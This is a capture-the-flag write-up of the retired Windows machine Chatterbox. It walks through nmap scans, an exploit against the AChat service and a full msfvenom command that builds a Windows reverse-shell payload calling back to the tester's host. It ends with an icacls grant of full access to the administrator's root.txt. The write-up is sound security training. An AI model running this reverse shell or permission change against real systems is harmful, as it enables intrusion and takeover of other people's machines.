Chatterbox is a vulnerable machine with Windows operating system among retired machines and it is expected to obtain user and rootflags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan
Full port Scan
As a result of the port scan, we encountered many open ports, we enumerated the known ports, first of all, the smb port, we did not get any results on this port. We looked at other ports, but again we did not find an entry point, the ports 9255 and 9256 that we detected in fullscande are remarkable (consecutive port numbers)
Let’s do a detailed version service scan with these
We see that the “AChatchatsystemhttpd” service is open, we make the request.
Let’s search forexploits related to it.
We saw this relatedexploit, we download it and look at the content.
This expoit code runs clac.exe.
Let’s try to edit and run this code.
I think it worked but we don’t know because we can’t see it 🙂 Let’s create code to create revershell with msfvenom
msfvenom -a x86 –platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14. 19 LPORT=4747 -e x86/unicode_mixed – b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX – f python
We created the buf using the command and now we let this buf be the content of the code.
Then we edited the exploit code and ran it
We obtainedshell from user\chatterbox\alfred.
And this is how we got our userflag.
Interestingly, we were able to view the files and folders of the adminstrator user, but we couldn’t read them.
Let’s provide a permission check right here
Here we see that we have authorization in the desktop user, but we do not have authorization to view root.txt.
Now let’s check the authorizations here and then we will define authorization for the Alfred user.
icacls Desktop -> authorization query
icacls root.txt /grantAlfred:(F) -> authorization
This way we were able to read the rootflag.